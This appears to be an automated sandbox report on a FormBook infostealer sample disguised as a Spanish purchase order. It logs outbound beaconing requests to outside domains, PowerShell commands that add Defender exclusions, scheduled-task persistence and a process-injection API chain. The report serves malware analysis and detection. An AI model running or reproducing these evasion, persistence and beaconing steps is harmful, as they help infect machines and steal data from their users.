                                          Jul 3, 2024 18:35:19.798968077 CEST182OUTGET /md02/?TPXh=M1D20hrtEA0YXOf/HK2sZrZVDkFjWbXD84BuCtYvxk7BtbkSICST3Apq92N7VT2icGdL8Ejrhw==&nHLDZb=8p-HvnKhThQhTxm HTTP/1.1
                                          Host: www.detroitreels.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6192.168.2.649740198.185.159.14480
                                          TimestampBytes transferredDirectionData
                                          Jul 3, 2024 18:36:00.832031965 CEST183OUTGET /md02/?TPXh=Huvb14v0kOWfNfmpMWoBgNUO4U2JwQZ3Rl/9gDSI5Y6jcOUTIOoj4XqjJyszJ9ZVOt8xpVdhjQ==&nHLDZb=8p-HvnKhThQhTxm HTTP/1.1
                                          Host: www.upcyclecharms.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Jul 3, 2024 18:36:01.290170908 CEST1236INHTTP/1.1 400 Bad Request
                                          Cache-Control: no-cache, must-revalidate
                                          Content-Length: 2061
                                          Content-Type: text/html; charset=UTF-8
                                          Date: Wed, 03 Jul 2024 16:36:01 UTC
                                          Expires: Thu, 01 Jan 1970 00:00:00 UTC
                                          Pragma: no-cache
                                          Server: Squarespace
                                          X-Contextid: KbvFUfwp/oeRfHS7w
                                          Connection: close
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d [TRUNCATED]
                                          Data Ascii: <!DOCTYPE html><head> <title>400 Bad Request</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 400; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 400; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em;
                                          Jul 3, 2024 18:36:01.290297985 CEST1124INData Raw: 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 31 31 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 65 6d 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 20
                                          Data Ascii: } footer span { margin: 0 11px; font-size: 1em; font-weight: 400; color: #a9a9a9; white-space: nowrap; } footer span strong { font-weight: 400; color: #191919; } @media (max-width: 600px) { body {


                                          Statistics

                                          CPU Usage

                                          Click to jump to process

                                          Memory Usage

                                          Click to jump to process

                                          High Level Behavior Distribution

                                          Click to dive into process behavior distribution

                                          Behavior

                                          Click to jump to process

                                          System Behavior

                                          General

                                          Target ID:0
                                          Start time:12:31:53
                                          Start date:03/07/2024
                                          Path:C:\Users\user\Desktop\Orden de compra 0307AR24.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\Orden de compra 0307AR24.exe"
                                          Imagebase:0xa70000
                                          File size:861'704 bytes
                                          MD5 hash:7BB0F568CE14D2350C704AEA2C4BC9DE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.2165242288.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2165242288.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.2165242288.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.2165242288.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.2165242288.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:low
                                          Has exited:true

                                          General

                                          Target ID:3
                                          Start time:12:31:58
                                          Start date:03/07/2024
                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Orden de compra 0307AR24.exe"
                                          Imagebase:0x6f0000
                                          File size:433'152 bytes
                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:4
                                          Start time:12:31:58
                                          Start date:03/07/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff66e660000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:5
                                          Start time:12:31:58
                                          Start date:03/07/2024
                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exe"
                                          Imagebase:0x6f0000
                                          File size:433'152 bytes
                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:6
                                          Start time:12:31:58
                                          Start date:03/07/2024
                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RggSaCWUvAyNK" /XML "C:\Users\user\AppData\Local\Temp\tmp362B.tmp"
                                          Imagebase:0x540000
                                          File size:187'904 bytes
                                          MD5 hash:48C2FE20575769DE916F48EF0676A965
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:7
                                          Start time:12:31:58
                                          Start date:03/07/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff66e660000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:8
                                          Start time:12:31:59
                                          Start date:03/07/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff66e660000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:9
                                          Start time:12:31:59
                                          Start date:03/07/2024
                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                          Imagebase:0xd90000
                                          File size:45'984 bytes
                                          MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.2215419280.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.2215419280.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.2215419280.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.2215419280.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.2215419280.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:10
                                          Start time:12:31:59
                                          Start date:03/07/2024
                                          Path:C:\Windows\explorer.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\Explorer.EXE
                                          Imagebase:0x7ff609140000
                                          File size:5'141'208 bytes
                                          MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 0000000A.00000002.4559239704.000000001048C000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                          Reputation:high
                                          Has exited:false

                                          General

                                          Target ID:11
                                          Start time:12:32:01
                                          Start date:03/07/2024
                                          Path:C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exe
                                          Imagebase:0x6b0000
                                          File size:861'704 bytes
                                          MD5 hash:7BB0F568CE14D2350C704AEA2C4BC9DE
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.2239061216.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.2239061216.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.2239061216.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.2239061216.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.2239061216.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                          Antivirus matches:
                                          • Detection: 100%, Joe Sandbox ML
                                          • Detection: 26%, ReversingLabs
                                          Reputation:low
                                          Has exited:true

                                          General

                                          Target ID:12
                                          Start time:12:32:01
                                          Start date:03/07/2024
                                          Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                          Imagebase:0x7ff717f30000
                                          File size:496'640 bytes
                                          MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                          Has elevated privileges:true
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:false

                                          General

                                          Target ID:13
                                          Start time:12:32:03
                                          Start date:03/07/2024
                                          Path:C:\Windows\SysWOW64\autoconv.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Windows\SysWOW64\autoconv.exe"
                                          Imagebase:0x6f0000
                                          File size:842'752 bytes
                                          MD5 hash:A705C2ACED7DDB71AFB87C4ED384BED6
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:moderate
                                          Has exited:true

                                          General

                                          Target ID:14
                                          Start time:12:32:03
                                          Start date:03/07/2024
                                          Path:C:\Windows\SysWOW64\systray.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\SysWOW64\systray.exe"
                                          Imagebase:0x210000
                                          File size:9'728 bytes
                                          MD5 hash:28D565BB24D30E5E3DE8AFF6900AF098
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.4549121578.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.4549121578.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.4549121578.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.4549121578.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.4549121578.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.4549613061.00000000046E0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.4549613061.00000000046E0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.4549613061.00000000046E0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.4549613061.00000000046E0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.4549613061.00000000046E0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.4549675658.0000000004710000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.4549675658.0000000004710000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.4549675658.0000000004710000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.4549675658.0000000004710000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.4549675658.0000000004710000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:moderate
                                          Has exited:false

                                          General

                                          Target ID:15
                                          Start time:12:32:06
                                          Start date:03/07/2024
                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RggSaCWUvAyNK" /XML "C:\Users\user\AppData\Local\Temp\tmp5339.tmp"
                                          Imagebase:0x540000
                                          File size:187'904 bytes
                                          MD5 hash:48C2FE20575769DE916F48EF0676A965
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          General

                                          Target ID:16
                                          Start time:12:32:06
                                          Start date:03/07/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff66e660000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          General

                                          Target ID:17
                                          Start time:12:32:06
                                          Start date:03/07/2024
                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                          Imagebase:0xc40000
                                          File size:45'984 bytes
                                          MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          General

                                          Target ID:18
                                          Start time:12:32:07
                                          Start date:03/07/2024
                                          Path:C:\Windows\SysWOW64\cmd.exe
                                          Wow64 process (32bit):true
                                          Commandline:/c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                          Imagebase:0x1c0000
                                          File size:236'544 bytes
                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          General

                                          Target ID:19
                                          Start time:12:32:07
                                          Start date:03/07/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff66e660000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          General

                                          Target ID:21
                                          Start time:12:32:13
                                          Start date:03/07/2024
                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\SysWOW64\rundll32.exe"
                                          Imagebase:0xb0000
                                          File size:61'440 bytes
                                          MD5 hash:889B99C52A60DD49227C5E485A016679
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000015.00000002.2320893127.0000000002800000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000015.00000002.2320893127.0000000002800000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000015.00000002.2320893127.0000000002800000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000015.00000002.2320893127.0000000002800000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000015.00000002.2320893127.0000000002800000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                          Has exited:true

                                          Disassembly

                                          Reset < >

                                            Execution Graph

                                            Execution Coverage:11.5%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:0%
                                            Total number of Nodes:234
                                            Total number of Limit Nodes:4
                                            execution_graph 29533 2c8bc18 29534 2c8bc5a 29533->29534 29535 2c8bc60 GetModuleHandleW 29533->29535 29534->29535 29536 2c8bc8d 29535->29536 29582 4e2afc0 PostMessageW 29583 4e2b02c 29582->29583 29584 4e27f00 29588 4e289c8 29584->29588 29592 4e289b8 29584->29592 29585 4e27f06 29589 4e289dc 29588->29589 29596 4e28a31 29589->29596 29593 4e289bc 29592->29593 29595 4e28a31 2 API calls 29593->29595 29594 4e289ee 29594->29585 29595->29594 29597 4e28a55 29596->29597 29601 4e28a79 29597->29601 29606 4e28a88 29597->29606 29598 4e289ee 29598->29585 29602 4e28a9d 29601->29602 29611 4e28ce8 29602->29611 29616 4e28cf8 29602->29616 29603 4e28ab5 29603->29598 29607 4e28a9d 29606->29607 29609 4e28ce8 2 API calls 29607->29609 29610 4e28cf8 2 API calls 29607->29610 29608 4e28ab5 29608->29598 29609->29608 29610->29608 29612 4e28cec 29611->29612 29613 4e28d12 29612->29613 29620 4e29160 29612->29620 29630 4e29198 29612->29630 29613->29603 29617 4e29160 2 API calls 29616->29617 29618 4e28d12 29616->29618 29619 4e29198 2 API calls 29616->29619 29617->29618 29618->29603 29619->29618 29622 4e29165 29620->29622 29625 4e293ff 29622->29625 29640 4e298e0 29622->29640 29644 4e298b1 29622->29644 29625->29613 29632 4e291fb 29630->29632 29631 4e293ab 29633 4e28dc0 MessageBoxW 29631->29633 29635 4e293ff 29632->29635 29638 4e298e0 OleInitialize 29632->29638 29639 4e298b1 OleInitialize 29632->29639 29634 4e293d9 29633->29634 29636 4e2ad50 OleInitialize 29634->29636 29637 4e2ad49 OleInitialize 29634->29637 29635->29613 29636->29635 29637->29635 29638->29631 29639->29631 29641 4e298e8 29640->29641 29659 4e28dfc 29641->29659 29645 4e293ab 29644->29645 29646 4e28dfc OleInitialize 29644->29646 29647 4e28dc0 29645->29647 29646->29645 29648 4e2ab78 MessageBoxW 29647->29648 29650 4e293d9 29648->29650 29651 4e2ad49 29650->29651 29655 4e2ad50 29650->29655 29652 4e2ad4c 29651->29652 29674 4e29fac 29652->29674 29654 4e2ad5f 29654->29625 29656 4e2ad54 29655->29656 29657 4e29fac OleInitialize 29656->29657 29658 4e2ad5f 29657->29658 29658->29625 29660 4e28e07 29659->29660 29663 4e2904c 29660->29663 29662 4e29939 29664 4e29057 29663->29664 29666 4e29a09 29664->29666 29667 4e29134 29664->29667 29666->29662 29668 4e2913f 29667->29668 29670 4e29d23 29668->29670 29671 4e29150 29668->29671 29670->29666 29672 4e29d58 OleInitialize 29671->29672 29673 4e29dbc 29672->29673 29673->29670 29675 4e29fb7 29674->29675 29676 4e2904c OleInitialize 29675->29676 29677 4e2adb1 29676->29677 29677->29677 29537 4e29976 29540 4e2905c 29537->29540 29541 4e29067 29540->29541 29545 4e2a588 29541->29545 29549 4e2a598 29541->29549 29542 4e29983 29546 4e2a58c 29545->29546 29553 4e29ef4 29546->29553 29550 4e2a5e7 29549->29550 29551 4e29ef4 EnumThreadWindows 29550->29551 29552 4e2a668 29551->29552 29552->29542 29554 4e2a688 EnumThreadWindows 29553->29554 29556 4e2a668 29554->29556 29556->29542 29515 2c8bcc0 29516 2c8bcd4 29515->29516 29518 2c8bcf9 29516->29518 29519 2c8b6f8 29516->29519 29520 2c8bea0 LoadLibraryExW 29519->29520 29522 2c8bf19 29520->29522 29522->29518 29523 2c8dcc0 29524 2c8dd06 29523->29524 29527 2c8dea0 29524->29527 29530 2c8b914 29527->29530 29531 2c8df08 DuplicateHandle 29530->29531 29532 2c8ddf3 29531->29532 29557 2c846d0 29558 2c846e2 29557->29558 29561 2c84720 29558->29561 29559 2c846ee 29562 2c8473c 29561->29562 29563 2c84747 29562->29563 29565 2c84811 29562->29565 29563->29559 29566 2c84835 29565->29566 29570 2c84d18 29566->29570 29574 2c84d28 29566->29574 29572 2c84d4f 29570->29572 29571 2c84e2c 29571->29571 29572->29571 29578 2c846a0 29572->29578 29576 2c84d4f 29574->29576 29575 2c84e2c 29575->29575 29576->29575 29577 2c846a0 CreateActCtxA 29576->29577 29577->29575 29579 2c85db8 CreateActCtxA 29578->29579 29581 2c85e7b 29579->29581 29678 4e27edd 29679 4e27ee1 29678->29679 29680 4e27ef8 29679->29680 29683 4e2ce88 29679->29683 29698 4e2ce78 29679->29698 29684 4e2cea2 29683->29684 29690 4e2ceaa 29684->29690 29713 4e2d2de 29684->29713 29718 4e2d35b 29684->29718 29729 4e2d337 29684->29729 29740 4e2d431 29684->29740 29745 4e2d3f1 29684->29745 29750 4e2d78d 29684->29750 29755 4e2d548 29684->29755 29760 4e2d52a 29684->29760 29765 4e2d905 29684->29765 29770 4e2d3a6 29684->29770 29774 4e2d380 29684->29774 29779 4e2d47c 29684->29779 29690->29680 29699 4e2ce7c 29698->29699 29700 4e2d380 2 API calls 29699->29700 29701 4e2d3a6 2 API calls 29699->29701 29702 4e2d905 2 API calls 29699->29702 29703 4e2d52a 2 API calls 29699->29703 29704 4e2d548 2 API calls 29699->29704 29705 4e2d78d 2 API calls 29699->29705 29706 4e2d3f1 2 API calls 29699->29706 29707 4e2d431 2 API calls 29699->29707 29708 4e2d337 4 API calls 29699->29708 29709 4e2d35b 4 API calls 29699->29709 29710 4e2d2de 2 API calls 29699->29710 29711 4e2ceaa 29699->29711 29712 4e2d47c 2 API calls 29699->29712 29700->29711 29701->29711 29702->29711 29703->29711 29704->29711 29705->29711 29706->29711 29707->29711 29708->29711 29709->29711 29710->29711 29711->29680 29712->29711 29714 4e2d2e4 29713->29714 29784 4e27ad0 29714->29784 29788 4e27ac5 29714->29788 29719 4e2d343 29718->29719 29719->29718 29720 4e2dace 29719->29720 29721 4e2d355 29719->29721 29723 4e2d4d6 29719->29723 29720->29690 29792 4e276b0 29721->29792 29796 4e276a9 29721->29796 29722 4e2d7b0 29800 4e27930 29723->29800 29804 4e27938 29723->29804 29724 4e2db88 29732 4e2d343 29729->29732 29730 4e2d355 29738 4e276b0 Wow64SetThreadContext 29730->29738 29739 4e276a9 Wow64SetThreadContext 29730->29739 29731 4e2d7b0 29732->29730 29733 4e2dace 29732->29733 29734 4e2d4d6 29732->29734 29733->29690 29736 4e27930 ReadProcessMemory 29734->29736 29737 4e27938 ReadProcessMemory 29734->29737 29735 4e2db88 29736->29735 29737->29735 29738->29731 29739->29731 29741 4e2d437 29740->29741 29808 4e271c8 29741->29808 29812 4e271c0 29741->29812 29742 4e2d45d 29742->29690 29746 4e2d3ae 29745->29746 29747 4e2d3c0 29745->29747 29748 4e276b0 Wow64SetThreadContext 29746->29748 29749 4e276a9 Wow64SetThreadContext 29746->29749 29747->29690 29748->29747 29749->29747 29751 4e2d795 29750->29751 29753 4e276b0 Wow64SetThreadContext 29751->29753 29754 4e276a9 Wow64SetThreadContext 29751->29754 29752 4e2d7b0 29753->29752 29754->29752 29756 4e2d555 29755->29756 29816 4e27840 29756->29816 29820 4e27848 29756->29820 29757 4e2d9f0 29761 4e2d62c 29760->29761 29763 4e27840 WriteProcessMemory 29761->29763 29764 4e27848 WriteProcessMemory 29761->29764 29762 4e2dc3a 29763->29762 29764->29762 29766 4e2d448 29765->29766 29767 4e2d45d 29765->29767 29768 4e271c0 ResumeThread 29766->29768 29769 4e271c8 ResumeThread 29766->29769 29767->29690 29768->29767 29769->29767 29771 4e2d3c0 29770->29771 29772 4e276b0 Wow64SetThreadContext 29770->29772 29773 4e276a9 Wow64SetThreadContext 29770->29773 29771->29690 29772->29771 29773->29771 29775 4e2d4ad 29774->29775 29776 4e2d39f 29774->29776 29777 4e27840 WriteProcessMemory 29775->29777 29778 4e27848 WriteProcessMemory 29775->29778 29776->29690 29777->29776 29778->29776 29780 4e2d6b7 29779->29780 29824 4e27781 29780->29824 29828 4e27788 29780->29828 29781 4e2d6d5 29785 4e27b59 CreateProcessA 29784->29785 29787 4e27d1b 29785->29787 29789 4e27ad0 CreateProcessA 29788->29789 29791 4e27d1b 29789->29791 29793 4e276f5 Wow64SetThreadContext 29792->29793 29795 4e2773d 29793->29795 29795->29722 29797 4e276f5 Wow64SetThreadContext 29796->29797 29799 